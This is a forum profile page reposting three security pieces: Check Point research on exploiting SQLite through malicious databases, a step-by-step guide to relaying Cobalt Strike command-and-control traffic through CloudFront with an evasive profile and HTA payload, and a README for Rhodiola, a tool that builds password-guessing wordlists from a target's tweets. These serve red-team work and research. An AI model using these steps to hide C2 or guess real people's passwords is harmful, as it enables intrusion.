Jump to content

Nytro

Administrators
  • Posts

    18772
  • Joined

  • Last visited

  • Days Won

    729

Everything posted by Nytro

  1. SELECT code_execution FROM * USING SQLite; August 10, 2019 Gaining code execution using a malicious SQLite database Research By: Omer Gull tl;dr SQLite is one of the most deployed software in the world. However, from a security perspective, it has only been examined through the lens of WebSQL and browser exploitation. We believe that this is just the tip of the iceberg. In our long term research, we experimented with the exploitation of memory corruption issues within SQLite without relying on any environment other than the SQL language. Using our innovative techniques of Query Hijacking and Query Oriented Programming, we proved it is possible to reliably exploit memory corruptions issues in the SQLite engine. We demonstrate these techniques a couple of real-world scenarios: pwning a password stealer backend server, and achieving iOS persistency with higher privileges. We hope that by releasing our research and methodology, the security research community will be inspired to continue to examine SQLite in the countless scenarios where it is available. Given the fact that SQLite is practically built-in to every major OS, desktop or mobile, the landscape and opportunities are endless. Furthermore, many of the primitives presented here are not exclusive to SQLite and can be ported to other SQL engines. Welcome to the brave new world of using the familiar Structured Query Language for exploitation primitives. Motivation This research started when omriher and I were looking at the leaked source code of some notorious password stealers. While there are plenty of password stealers out there (Azorult, Loki Bot, and Pony to name a few), their modus operandi is mostly the same: A computer gets infected, and the malware either captures credentials as they are used or collects stored credentials maintained by various clients. It is not uncommon for client software to use SQLite databases for such purposes. After the malware collects these SQLite files, it sends them to its C2 server where they are parsed using PHP and stored in a collective database containing all of the stolen credentials. Skimming through the leaked source code of such password stealers, we started speculating about the attack surface described above. Can we leverage the load and query of an untrusted database to our advantage? Such capabilities could have much bigger implications in countless scenarios, as SQLite is one of the most widely deployed pieces of software out there. A surprisingly complex code base, available in almost any device imaginable. is all the motivation we needed, and so our journey began. SQLite Intro The chances are high that you are currently using SQLite, even if you are unaware of it. To quote its authors: SQLite is a C-language library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day. Unlike most other SQL databases, SQLite does not have a separate server process. SQLite reads and writes directly to ordinary disk files. A complete SQL database with multiple tables, indices, triggers, and views is contained within a single disk file. Attack Surface The following snippet is a fairly generic example of a password stealer backend. Given the fact that we control the database and its content, the attack surface available to us can be divided into two parts: The load and initial parsing of our database, and the SELECT query performed against it. The initial loading done by sqlite3_open is actually a very limited surface; it is basically a lot of setup and configuration code for opening the database. Our surface is mainly the header parsing which is battle-tested against AFL. Things get more interesting as we start querying the database. Using SQLite authors’ words: “The SELECT statement is the most complicated command in the SQL language.” Although we have no control over the query itself (as it is hardcoded in our target), studying the SELECT process carefully will prove beneficial in our quest for exploitation. As SQLite3 is a virtual machine, every SQL statement must first be compiled into a byte-code program using one of the sqlite3_prepare* routines. Among other operations, the prepare function walks and expands all SELECT subqueries. Part of this process is verifying that all relevant objects (like tables or views) actually exist and locating them in the master schema. sqlite_master and DDL Every SQLite database has a sqlite_master table that defines the schema for the database and all of its objects (such as tables, views, indices, etc.). The sqlite_master table is defined as: The part that is of special interest to us is the sql column. This field is the DDL (Data Definition Language) used to describe the object. In a sense, the DDL commands are similar to C header files. DDL commands are used to define the structure, names, and types of the data containers within a database, just as a header file typically defines type definitions, structures, classes, and other data structures. These DDL statements actually appear in plain-text if we inspect the database file: During the query preparation, sqlite3LocateTable() attempts to find the in-memory structure that describes the table we are interested in querying. sqlite3LocateTable() reads the schema available in sqlite_master, and if this is the first time doing it, it also has a callback for every result that verifies the DDL statement is valid and build the necessary internal data structures that describe the object in question. DDL Patching Learning about this preparation process, we asked, can we simply replace the DDL that appears in plain-text within the file? If we could inject our own SQL to the file perhaps we can affect its behaviour. Based on the code snippet above, it seems that DDL statements must begin with “create “. With this limitation in mind, we needed to assess our surface. Checking SQLite’s documentation revealed that these are the possible objects we can create: The CREATE VIEW command gave us an interesting idea. To put it very simply, VIEWs are just pre-packaged SELECT statements. If we replace the table expected by the target software with a compatible VIEW, interesting opportunities reveal themselves. Hijack Any Query Imagine the following scenario: The original database has a single TABLE called dummy that is defined as: The target software queries it with the following: We can actually hijack this query if we craft dummy as a VIEW: This “trap” VIEW enables us to hijack the query – meaning we generate a completely new query that we totally control. This nuance greatly expands our attack surface, from the very minimal parsing of the header and an uncontrollable query performed by the loading software, to the point where we can now interact with vast parts of the SQLite interpreter by patching the DDL and creating our own views with sub-queries. Now that we can interact with the SQLite interpreter, our next question was what exploitation primitives are built into SQLite? Does it allow any system commands, reading from or writing to the filesystem? As we are not the first to notice the huge SQLite potential from an exploitation perspective, it makes sense to review prior work done in the field. We started from the very basics. SQL Injections As researchers, it’s hard for us to even spell SQL without the “i”, so it seems like a reasonable place to start. After all, we want to familiarize ourselves with the internal primitives offered by SQLite. Are there any system commands? Can we load arbitrary libraries? It seems that the most straightforward trick involves attaching a new database file and writing to it using something along the lines of: We attach a new database, create a single table and insert a single line of text. The new database then creates a new file (as databases are files in SQLite) with our web shell inside it. The very forgiving nature of the PHP interpreter parses our database until it reaches the PHP open tag of “<?”. Writing a webshell is definitely a win in our password stealers scenario, however, as you recall, DDL cannot begin with “ATTACH” Another relevant option is the load_extension function. While this function should allow us to load an arbitrary shared object, it is disabled by default. Memory Corruptions In SQLite Like any other software written in C, memory safety issues are definitely something to consider when assessing the security of SQLite. In his great blog post, Michał Zalewski described how he fuzzed SQLite with AFL to achieve some impressive results: 22 bugs in just 30 minutes of fuzzing. Interestingly, SQLite has since started using AFL as an integral part of their remarkable test suite. These memory corruptions were all treated with the expected gravity (Richard Hip and his team deserve tons of respect). However, from an attacker’s perspective, these bugs would prove to be a difficult path to exploitation without a decent framework to leverage them. Modern mitigations pose a major obstacle in exploiting memory corruption issues and attackers need to find a more flexible environment. The Security Research community would soon find the perfect target! Web SQL Web SQL Database is a web page API for storing data in databases that can be queried using a variant of SQL through JavaScript.The W3C Web Applications Working Group ceased working on the specification in November 2010, citing a lack of independent implementations other than SQLite. Currently, the API is still supported by Google Chrome, Opera and Safari. All of them use SQLite as the backend of this API. Untrusted input into SQLite, reachable from any website inside some of the most popular browsers, caught the security community’s attention and as a result, the number of vulnerabilities began to rise. Suddenly, bugs in SQLite could be leveraged by the JavaScript interpreter to achieve reliable browser exploitation. Several impressive research reports have been published: Low hanging fruits like CVE-2015-7036 Untrusted pointer dereference fts3_tokenizer() More complex exploits presented in Blackhat 17 by the Chaitin team Type confusion in fts3OptimizeFunc() The recent Magellan bugs exploited by Exodus Integer overflow in fts3SegReaderNext() A clear pattern in past WebSQL research reveals that a virtual table module named ”FTS” might be an interesting target for our research. FTS Full-Text Search (FTS) is a virtual table module that allows textual searches on a set of documents. From the perspective of an SQL statement, the virtual table object looks like any other table or view. But behind the scenes, queries on a virtual table invoke callback methods on shadow tables instead of the usual reading and writing on the database file. Some virtual table implementations, like FTS, make use of real (non-virtual) database tables to store content. For example, when a string is inserted into the FTS3 virtual table, some metadata must be generated to allow for an efficient textual search. This metadata is ultimately stored in real tables named “%_segdir” and “%_segments”, while the content itself is stored in “”%_content” where “%” is the name of the original virtual table. These auxiliary real tables that contain data for a virtual table are called “shadow tables” Due to their trusting nature, interfaces that pass data between shadow tables provide a fertile ground for bugs. CVE-2019-8457,- a new OOB read vulnerability we found in the RTREE virtual table module, demonstrates this well. RTREE virtual tables, used for geographical indexing, are expected to begin with an integer column. Therefore, other RTREE interfaces expect the first column in an RTREE to be an integer. However, if we create a table where the first column is a string, as shown in the figure below, and pass it to the rtreenode() interface, an OOB read occurs. Now that we can use query hijacking to gain control over a query, and know where to find vulnerabilities, it’s time to move on to exploit development. SQLite Internals For Exploit Development Previous publications on SQLite exploitation clearly show that there has always been a necessity for a wrapping environment, whether it is the PHP interpreter seen in this awesome blog post on abusing SQLite tokenizers or the more recent work on Web SQL from the comfort of a JavaScript interpreter. As SQLite is pretty much everywhere, limiting its exploitation potential sounded like low-balling to us and we started exploring the use of SQLite internals for exploitation purposes. The research community became pretty good at utilizing JavaScript for exploit development. Can we achieve similar primitives with SQL? Bearing in mind that SQL is Turing complete ([1], [2]), we started creating a primitive wish-list for exploit development based on our pwning experience. A modern exploit written purely in SQL has the following capabilities: Memory leak. Packing and unpacking of integers to 64-bit pointers. Pointer arithmetics. Crafting complex fake objects in memory. Heap Spray. One by one, we will tackle these primitives and implement them using nothing but SQL. For the purpose of achieving RCE on PHP7, we will utilize the still unfixed 1-day of CVE-2015-7036. Wait, what? How come a 4-year-old bug has never been fixed? It is actually an interesting story and a great example of our argument. This feature was only ever considered vulnerable in the context of a program that allows arbitrary SQL from an untrusted source (Web SQL), and so it was mitigated accordingly. However, SQLite usage is so versatile that we can actually still trigger it in many scenarios ? Exploitation Game-plan CVE-2015-7036 is a very convenient bug to work with. In a nutshell, the vulnerable fts3_tokenizer() function returns the tokenizer address when called with a single argument (like “simple”, “porter” or any other registered tokenizer). When called with 2 arguments, fts3_tokenizer overrides the tokenizer address in the first argument with the address provided by a blob in the second argument. After a certain tokenizer has been overridden, any new instance of the fts table that uses this tokenizer allows us to hijack the flow of the program. Our exploitation game-plan: Leak a tokenizer address Compute the base address Forge a fake tokenizer that will execute our malicious code Override one of the tokenizers with our malicious tokenizer Instantiate an fts3 table to trigger our malicious code Now back to our exploit development. Query Oriented Programming © We are proud to present our own unique approach for exploit development using the familiar structured query language. We share QOP with the community in the hope of encouraging researchers to pursue the endless possibilities of database engines exploitation. Each of the following primitives is accompanied by an example from the sqlite3 shell. While this will give you a hint of what want to achieve, keep in mind that our end goal is to plant all those primitives in the sqlite_master table and hijack the queries issued by the target software that loads and queries our malicious SQLite db file Memory Leak – Binary Mitigations such as ASLR definitely raised the bar for memory corruptions exploitation. A common way to defeat it is to learn something about the memory layout around us. This is widely known as Memory Leak. Memory leaks are their own sub-class of vulnerabilities, and each one has a slightly different setup. In our case, the leak is the return of a BLOB by SQLite. These BLOBs make a fine leak target as they sometimes hold memory pointers. The vulnerable fts3_tokenizer() is called with a single argument and returns the memory address of the requested tokenizer. hex() makes it readable by humans. We obviously get some memory address, but it is reversed due to little-endianity. Surely we can flip it using some SQLite built-in string operations. substr() seems to be a perfect fit! We can read little-endian BLOBs but this raises another question: how do we store things? QOP Chain Naturally, storing data in SQL requires an INSERT statement. Due to the hardened verification of sqlite_master, we can’t use INSERT as all of the statements must start with “CREATE “. Our approach to this challenge is to simply store our queries under a meaningful VIEW and chain them together. The following example makes it a bit clearer: This might not seem like a big difference, but as our chain gets more complicated, being able to use pseudo-variables will surely make our life easier. Unpacking of 64-bit pointers If you’ve ever done any pwning challenges, the concept of packing and unpacking of pointers should not be foreign. This primitive should make it easy to convert our hexadecimal values (like the leak we just achieved) to integers. Doing so allows us to perform various calculations on these pointers in the next steps. This query iterates a hexadecimal string char by char in a reversed fashion using substr(). A translation of this char is done using this clever trick with the minor adjustment of instr() which is 1-based. All that is needed now is the proper shift that is on the right of the * sign. Pointer arithmetics Pointer arithmetics is a fairly easy task with integers at hand. For example, extracting the image base from our leaked tokenizer pointer is as easy as: Packing of 64-bit pointers After reading leaked pointers and manipulating them to our will, it makes sense to pack them back to their little-endian form so we can write them somewhere. SQLite char() should be of use here as its documentation states that it will “return a string composed of characters having the Unicode code point values of an integer.” It proved to work fairly well, but only on a limited range of integers Larger integers were translated to their 2-bytes code-points. After banging our heads against SQLite documentation, we suddenly had a strange epiphany: our exploit is actually a database. We can prepare beforehand a table that maps integers to their expected values. Now our pointer packing query is the following: Crafting complex fake objects in memory Writing a single pointer is definitely useful, but still not enough. Many memory safety issues exploitation scenarios require the attackers to forge some object or structure in memory or even write a ROP chain. Essentially, we will string several of the building blocks we presented earlier. For example, let’s forge our own tokenizer, as explained here. Our fake tokenizer should conform to the interface expected by SQLite defined here: Using the methods described above and a simple JOIN query, we are able to fake the desired object quite easily. Verifying the result in a low-level debugger, we see that indeed a fake tokenizer object was created. Heap Spray Now that we crafted our fake object, it is sometimes useful to spray the heap with it. This should ideally be some repetitive form of the latter. Unfortunately, SQLite does not implement the REPEAT() function like MySQL. However, this thread gave us an elegant solution. The zeroblob(N) function returns a BLOB consisting of N bytes while we use replace() to replace those zeros with our fake object. Searching for those 0x41s shows we also achieved a perfect consistency. Notice the repetition every 0x20 bytes. Memory Leak – Heap Looking at our exploitation game plan, it seems like we are moving in the right direction. We already know where the binary image is located, we were able to deduce where the necessary functions are, and spray the heap with our malicious tokenizer. Now it’s time to override a tokenizer with one of our sprayed objects. However, as the heap address is also randomized, we don’t know where our spray is allocated. A heap leak requires us to have another vulnerability. Again, we will target a virtual table interface. As virtual tables use underlying shadow tables, it is quite common for them to pass raw pointers between different SQL interfaces. Note: This exact type of issue was mitigated in SQLite 3.20. Fortunately, PHP7 is compiled with an earlier version. In case of an updated version, CVE-2019-8457 could be used here as well. To leak the heap address, we need to generate an fts3 table beforehand and abuse its MATCH interface. Just as we saw in our first memory leak, the pointer is little-endian so it needs to be reversed. Fortunately, we already know how to do so using SUBSTR(). Now that we know our heap location, and can spray properly, we can finally override a tokenizer with our malicious tokenizer! Putting It All Together With all the desired exploitation primitives at hand, it’s time to go back to where we started: exploiting a password stealer C2. As explained above, we need to set up a “trap” VIEW to kickstart our exploit. Therefore, we need to examine our target and prepare the right VIEW. As seen in the snippet above, our target expects our db to have a table called Notes with a column called BodyRich inside it. To hijack this query, we created the following VIEW After Notes is queried, 3 QOP Chains execute. Let’s analyze the first one of them. heap_spray Our first QOP chain should populate the heap with a large amount of our malicious tokenizer. p64_simple_create, p64_simple_destroy, and p64_system are essentially all chains achieved with our leak and packing capabilities. For example, p64_simple_create is constructed as: As these chains get pretty complex, pretty fast, and are quite repetitive, we created QOP.py. QOP.py makes things a bit simpler by generating these queries in pwntools style. Creating the previous statements becomes as easy as: Demo COMMIT; Now that we have established a framework to exploit any situation where the querier cannot be sure that the database is non-malicious, let’s explore another interesting use case for SQLite exploitation. iOS Persistency Persistency is hard to achieve on iOS as all executable files must be signed as part of Apple’s Secure Boot. Luckily for us, SQLite databases are not signed. Utilizing our new capabilities, we will replace one of the commonly used databases with a malicious version. After the device reboots and our malicious database is queried, we gain code execution. To demonstrate this concept, we replace the Contacts DB “AddressBook.sqlitedb”. As done in our PHP7 exploit, we create two extra DDL statements. One DDL statement overrides the default tokenizer “simple”, and the other DDL statement triggers the crash by trying to instantiate the overridden tokenizer. Now, all we have to do is re-write every table of the original database as a view that hijacks any query performed and redirect it toward our malicious DDL. Replacing the contacts db with our malicious contacts db and rebooting results in the following iOS crashdump: As expected, the contacts process crashed at 0x4141414141414149 where it expected to find the xCreate constructor of our false tokenizer. Furthermore, the contacts db is actually shared among many processes. Contacts, Facetime, Springboard, WhatsApp, Telegram and XPCProxy are just some of the processes querying it. Some of these processes are more privileged than others. Once we proved that we can execute code in the context of the querying process, this technique also allows us to expand and elevate our privileges. Our research and methodology have all been responsibly disclosed to Apple and were assigned the following CVEs: CVE-2019-8600 CVE-2019-8598 CVE-2019-8602 CVE-2019-8577 Future Work Given the fact that SQLite is practically built-in to almost any platform, we think that we’ve barely scratched the tip of the iceberg when it comes to its exploitation potential. We hope that the security community will take this innovative research and the tools released and push it even further. A couple of options we think might be interesting to pursue are Creating more versatile exploits. This can be done by building exploits dynamically by choosing the relevant QOP gadgets from pre-made tables using functions such as sqlite_version() or sqlite_compileoption_used(). Achieving stronger exploitation primitives such as arbitrary R/W. Look for other scenarios where the querier cannot verify the database trustworthiness. Conclusion We established that simply querying a database may not be as safe as you expect. Using our innovative techniques of Query Hijacking and Query Oriented Programming, we proved that memory corruption issues in SQLite can now be reliably exploited. As our permissions hierarchies become more segmented than ever, it is clear that we must rethink the boundaries of trusted/untrusted SQL input. To demonstrate these concepts, we achieved remote code execution on a password stealer backend running PHP7 and gained persistency with higher privileges on iOS. We believe that these are just a couple of use cases in the endless landscape of SQLite. Check Point IPS Product Protects against this threat: “SQLite fts3_tokenizer Untrusted Pointer Remote Code Execution (CVE-2019-8602).” Sursa: https://research.checkpoint.com/select-code_execution-from-using-sqlite/
  2. Using CloudFront to Relay Cobalt Strike Traffic Brian Fehrman // Many of you have likely heard of Domain Fronting. Domain Fronting is a technique that can allow your C2 traffic to blend in with a target’s traffic by making it appear that it is calling out to the domain owned by your target. This is a great technique for red teamers to hide their traffic. Amazon CloudFront was a popular service for making Domain Fronting happen. Recently, however, changes have been made to CloudFront that no longer allow for Domain Fronting through CloudFront to work with Cobalt Strike. Is all lost with CloudFront and Cobalt Strike? In my opinion, no! CloudFront can still be extremely useful for multiple reasons: No need for a categorized domain for C2 traffic Traffic blends in, to a degree, with CDN traffic CloudFront is whitelisted by some companies Mitigates the chances of burning your whole C2 infrastructure since your source IP is hidden Traffic will still go over HTTPS In this post, I will walk you through the steps that I typically use for getting CloudFront up and going with Cobalt Strike. The general steps are as follows: Setup a Cobalt Strike (CS) server Register a domain and point it your CS server Generate an HTTPS cert for your domain Create a CloudFront distribution to point to your domain Generate a CS profile that utilizes your HTTPS cert and the CloudFront distribution Generate a CS payload to test the setup 1. Setup a Cobalt Strike (CS) server In this case, I set up a Debian-based node on Digital Ocean (I will call this “your server”). I ran the following to get updated and setup with OpenJDK, which is needed for Cobalt Strike (CS): apt-get update && apt-get upgrade -y && apt-get install -y openjdk-8-jdk-headless Grab the latest Cobalt Strike .tgz file from https://www.cobaltstrike.com/download and place it onto your server. Unzip the .tgz, enter the directory, and install it with the following commands: tar -xvf cobaltstrike-trial.tgz && cd cobaltstrike && ./update Note that you will need to enter your license key at this point. This is all the setup that we need to do for now on CS. We will do some more configuration as we go. 2. Register a domain and point it to your CS server We will need to register a domain so that we can generate an HTTPS certificate. CloudFront requires that you have a valid domain with an HTTPS cert that is pointed at a server that is running something like Apache so that it can verify that the certificate is valid. The domain does not need to be categorized, which makes things easy. I like to use https://www.namesilo.com but you are free to use whatever registrar that you prefer. In this case, I just searched for “bhisblogtest” and picked the cheapest extension, which was bhisblogtest.xyz for $0.99 for the year. Searching for a Domain One of the reasons that I like namesilo.com is that you get free WHOIS Privacy; some companies charge for this. Plus, it doesn’t tack on additional ICANN fees. WHOIS Privacy Included for Free by namesilo.com After you register the domain, use namesilo.com to update the DNS records. I typically delete the default records that it creates. After deleting the default DNS records, create a single A-Record that points to your server. In this case, my server’s IP was 159.65.46.217. NOTE: For those of you that are getting some urges right now, I wouldn’t suggest attacking it as it was burned before this was posted and likely belongs to somebody else if it is currently live. Setting DNS A-Record for Domain Wait until the DNS records propagate before moving onto the next step. In my experience, this will typically take about 10-15 minutes. Run your favorite DNS lookup tool on the domain that you registered and wait until the IP address returned matches the IP address of your server. In this case, we run the following until we see 159.65.46.217 returned: nslookup bhisblogtest.xyz DNS Record has Propagated Note: Debian doesn’t always have DNS tools installed… you might need to run the following command first if you can’t use nslookup, dig, etc.: apt-get install -y dnsutils 3. Generate an HTTPS certificate for your domain In the old days, you had to pay money for valid certificates that were signed by a respected Certificate Authority. Nowadays, we can generate them quickly and freely by using LetsEncrypt. In particular, we will use the HTTPsC2DoneRight.sh script from @KillSwitch-GUI. Before we can use the HTTPsC2DoneRight.sh script, we need to install a few prerequisites. Run the following commands on your server, assuming Debian, to install the prerequisites: apt-get install -y git lsof Next, make sure you are in your root directory, grab the HTTPsC2DoneRight.sh script, enable execution, and run it: cd && wget https://raw.githubusercontent.com/killswitch-GUI/CobaltStrike-ToolKit/master/HTTPsC2DoneRight.sh && chmod +x HTTPsC2DoneRight.sh && ./HTTPsC2DoneRight.sh Once the script runs, you will need to enter your domain name that you registered, a password for the HTTPs certificate, and the location of your “cobaltstrike” folder. Running HTTPsC2DoneRight.sh If all goes well, you should have an Amazon-based CS profile, named amazon.profile, in a folder named “httpsProfile” that is within your “cobaltstrike” folder. The Java Keystore associated with your HTTPS certificate will also be in the “httpsProfile” folder. Output from HTTPsC2DoneRight.sh If you run the command tail on amazon.profile, you will see information associated with your HTTPS certificate in the CS profile. We will actually be generating a new CS profile later but will need the four lines at the end of amazon.profile for that profile. The tail of amazon.profile from HTTPsC2DoneRight.sh Showing Certificate Information Needed for CS Profile At this point, you should be able to open a web browser, head to https://<yourdomain>, and see the default Apache page without any certificate errors. If the aforementioned doesn’t happen, then something has gone wrong somewhere in the process and the remaining steps likely won’t succeed. Verifying HTTPS Certificate was Correctly Generated 4. Create a CloudFront distribution to point to your domain The next step is to create a CloudFront distribution and point it your domain. The following is the article that I originally used and still reference to get the settings correct: https://medium.com/rvrsh3ll/ssl-domain-fronting-101-4348d410c56f Head to https://console.aws.amazon.com/cloudfront/home and login or create an account if you don’t have one already; it’s free. Click on “Create Distribution” at the top of the page. Create CloudFront Distribution Click on “Get Started’ under the “Web” section of the page. Choosing “Get Started” under “Web” Section Enter in your domain name for the “Origin Domain Name” field. The “Origin ID” field will automatically be populated for you. Make sure that the remaining settings match the following screenshots. First Section of CloudFront Distribution Settings Second Set of CloudFront Distribution Settings The remaining settings that are not included in the screenshots above do not need to be altered. Scroll to the bottom of the page and click the “Create Distribution” button. Click “Create Distribution” after Updating CloudFront Settings You will be taken back to the CloudFront main menu and you should see a cloudfront.net address that is associated with your domain. The CloudFront address will be what we use to refer to our server from now on. You should see “In Progress” under the “Status” column. Wait until “In Progress” has changed to “Deployed” before proceeding. You may need to refresh the page a few times as this could take 10 or 15 minutes. CloudFront Distribution Address Deploying After your distribution has been deployed, test that it is working by visiting https://<your_cloudfront.net_address> and verify that you see the Apache2 default page without any certificate errors. Verifying CloudFront Distribution is Deployed 5. Generate a CS profile that utilizes your HTTPS cert and the CloudFront distribution We will now generate a CS profile to take advantage of our CloudFront distribution. Since most default CS profiles get flagged, we will take the time here to generate a new one. On your server, head back to the home directory and grab the Malleable-C2-Randomizer script by bluescreenofjeff. cd && git clone https://github.com/bluscreenofjeff/Malleable-C2-Randomizer && cd Malleable-C2-Randomizer The next step is to generate a random CS profile. I’ve found that the Pandora.profile template provides the fewest issues with this technique. Run the following command to generate a profile. python malleable-c2-randomizer.py -profile Sample\ Templates/Pandora.profile -notest We need to copy the profile that was created to the “httpsProfile” folder in our “cobaltstrike” folder. The screenshot below shows an example of the output from the Malleable-C2-Randomizer script and copying that file to the “httpsProfile” folder. Copying Malleable-C2-Randomizer Output-File to /root/cobaltstrike/httpsProfile/ Head into the “httpsProfile” folder so that we can modify our newly-created CS profile. cd /root/cobaltstrike/httpsProfile Remember when we did a tail on the amazon.profile file and saw the four lines that started with “https-certificate”? We need to grab those four lines and place them at the bottom of our new, CS Pandora-profile. Run the command tail again on amazon.profile and copy the last four lines (the https-certificate section). Copy Last Four Lines of amazon.profile Open the newly-created Pandora profile in the text editor of your choice. Paste the four lines that you just copied to the bottom of the Pandora profile. Pasting Certificate Information into Pandora Profile For good OpSec, we should change the default process to which our payload will spawn. Add the following lines to the end of your Pandora profile file, underneath of the https-certificate section that you added. post-ex { set spawnto_x86 "%windir%\\syswow64\\mstsc.exe"; set spawnto_x64 "%windir%\\sysnative\\mstsc.exe"; } Code Added to Pandora Profile to Change SpawnTo Process The last thing that we need to modify in our Pandora profile is the host to which our payload will beacon. There are two places in the profile where the host needs to be changed. Find both locations in the Pandora profile where “Host” is mentioned and change the address to point to your cloudfront.net address that was generated as part of your CloudFront distribution. One Location of “Host” Value in Pandora Profile Other Location of “Host” Value in Pandora Profile Kill the apache2 service on your server since it will conflict with the CS Listener that we will create in the final step. Run the following command on your server: service apache2 stop We are now ready to launch our CS Team Server with the new profile. Move up a directory so that you are in the cobaltstrike directory, which is /root/cobaltstrike in this case. Run the CS Team Server with the following template for a command: ./teamserver <IP OF CS SERVER> <PASSWORD FOR SERVER> <PATH TO PANDORA PROFILE> <C2 KILL DATE> Running CS Team Server with Custom Pandora Profile The CS Team Server should now be up and running and we can move onto the final steps. 6. Generate a CS payload to test the setup The final step is to start a CS Listener and generate a CS payload. This step assumes you have installed the CS client on a system. Open the CS client and connect to your CS Team Server. Connecting to CS Team Server Choose the option in the CS client to add a new listener. Name the listener anything that you would like, which is “rhttps” in this example. Select the “windows/beacon_https/reverse_https” payload in the drop-down menu. In the “Host” field, enter the address of your CloudFront distribution that you created earlier. Enter 443 in the “Port” field” and then click save. Settings for CS Listener An additional popup screen will be shown that asks you to enter a domain to use for beaconing. Enter your CloudFront distribution address as the domain for beaconing and click the “Ok” button. CloudFront Address Used as Beaconing Domain You should now have a CS Listener up and running that is taking advantage of all of the work that has been done up to this point. The last step is to generate a payload to test that everything is working. I will state at this point that any CS Payload that you generate and attempt to use without additional steps will almost certainly be caught by AV engines. Generating a payload that does not get caught by AV is enough material for another blog post. The gist of it is that you typically generate CS Shellcode and use a method to inject that shellcode into memory. We will not dive into those details in this blog post as the focus on this post is how to use CloudFront as a relay for CS. For our purposes here, disable all of the AV that you have on the Windows system on which you will run the payload. Select the “HTML Application” payload from the menu shown in the screenshot below. Selecting HTML Application as CS Payload Format Make sure that the “Listener” drop-down menu matches the name that you gave to your listener, which is “rhttps” in this case. Choose “Executable” from the “Method” drop-down menu. Click the “Generate” button, choose a location to save the payload, and then run the payload by double-clicking on the file that was generated. You should observe in your CS-client window that a session has been established! Choosing Payload Listener and Method Session Established Protections Preventing attackers from using CloudFront as a relay in your environment is, unfortunately, not as easy as just disallowing access to CloudFront. Disallowing access to CloudFront would likely “break” a portion of the internet for your company since many websites rely on CloudFront. To help mitigate the chances of an attacker establishing a C2 channel that uses CloudFront as a relay, we would suggest a strong application-whitelisting policy to prevent users from running malicious payloads in the first place. Conclusion Using CloudFront as a relay for your C2 server has many benefits that can allow you to bypass multiple protections within an environment and hide the origin of your C2 server. This article walked through all the steps that should be needed to set up a CloudFront distribution to use as a relay for a Cobalt Strike Team Server. Generating CS payloads that evade AV will be discussed in future posts. Join the BHIS Blog Mailing List – get notified when we post new blogs, webcasts, and podcasts. Sursa: https://www.blackhillsinfosec.com/using-cloudfront-to-relay-cobalt-strike-traffic/
      • 2
      • Upvote
  3. Nytro

    Rhodiola

    Utku Sen's _____ _ _ _ _ | __ \| | | (_) | | | |__) | |__ ___ __| |_ ___ | | __ _ | _ /| '_ \ / _ \ / _` | |/ _ \| |/ _` | | | \ \| | | | (_) | (_| | | (_) | | (_| | |_| \_\_| |_|\___/ \__,_|_|\___/|_|\__,_| Personalized wordlist generation by analyzing tweets. (A.K.A crunch2049) Rhodiola tool is developed to narrow the brute force combination pool by creating a personalized wordlist for target people. It finds interest areas of a given user by analyzing his/her tweets, and builds a personalized wordlist. The Idea Adversaries need to have a wordlist or combination-generation tool while conducting password guessing attacks. To narrow the combination pool, researchers developed a method named ”mask attack” where the attacker needs to assume a password’s structure. Even if it narrows the combination pool significantly, it’s still too large to use for online attacks or offline attacks with low hardware resources. Analyses on leaked password databases showed that people tend to use meaningful English words for their passwords, and most of them are nouns or proper nouns. Other research shows that people are choosing these nouns from their hobbies and other interest areas. Since people are exposing their hobbies and other interest areas on Twitter, it’s possible to identify these by analyzing their tweets. Rhodiola does that. Installation Rhodiola is written in Python 2.7 and tested on macOS, Debian based Linux systems. To install Rhodiola, run sudo python install.py on Rhodiola's directory. It will download and install necessary libraries and files. (Note:pip is required) Rhodiola requires Twitter Developer API keys to work (If you don't have that one, you can bring your own data. Check the details below). You can get them by creating a Twitter app from here: https://developer.twitter.com/en/docs/basics/getting-started After you get API keys, open Rhodiola.py with your favourite text editor and edit following fields: consumer_key = "YOUR_DATA_HERE" consumer_secret = "YOUR_DATA_HERE" access_key = "YOUR_DATA_HERE" access_secret = "YOUR_DATA_HERE" Usage Rhodiola has three different usage styles: base, regex and mask. In the base mode, Rhodiola takes a Twitter handle as an argument and generates a personalized wordlist with the following elements: Most used nouns&proper nouns, paired nouns&proper nouns, cities and years related to them. Example command: python rhodiola.py --username elonmusk Example output: ... tesla car boring spacex falcon rocket mars earth flamethrower coloradosprings tesla1856 boringcompany2018 ... In the regex mode, you can generate additional strings with the provided regex. These generated strings will be appended as a prefix or suffix to the words. For this mode, Rhodiola takes a regex value as an argument. There is also an optional argument: ”regex_place” which defines the string placement (Can be:"prefix" or "suffix". Default value is "suffix"). Example command: python rhodiola.py --username elonmusk --regex "(root|admin)\d{2} Example output: ... teslaroot01 teslaroot02 teslaroot03 ... spacexadmin01 spacexadmin02 spacexadmin03 ... tesla1856root99 ... boringcompany2018admin99 ... In the mask mode, user can provide hashcat style mask values. Only \l (lower-alpha) and \u (upper-alpha) charsets are available. Example command: python rhodiola.py --username elonmusk --mask "?u?l?u?u?l Example output: ... TeSLa CaR BoRIng SpACex FaLCon RoCKet MaRS EaRTh FlAMethrower CoLOradosprings TeSLa1856 BoRIngcompany2018 ... Bring Your Own Data If you don't have any Twitter API keys or you want to bring your own data, you can do it as well. Rhodiola provides you two different options. You can provide a text file which contains arbitrary text data, or you can provide a text file which contains different URLS. Rhodiola parses the texts from those URLs. Example command: python rhodiola.py --filename mydata.txt mydata.txt contains: Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. Example command: python rhodiola.py --urlfile blogs.txt blogs.txt contains: https://example.com/post1.html https://example.com/post2.html https://cnn.com/news.html Demo Video Sursa: https://github.com/tearsecurity/rhodiola
      • 1
      • Upvote
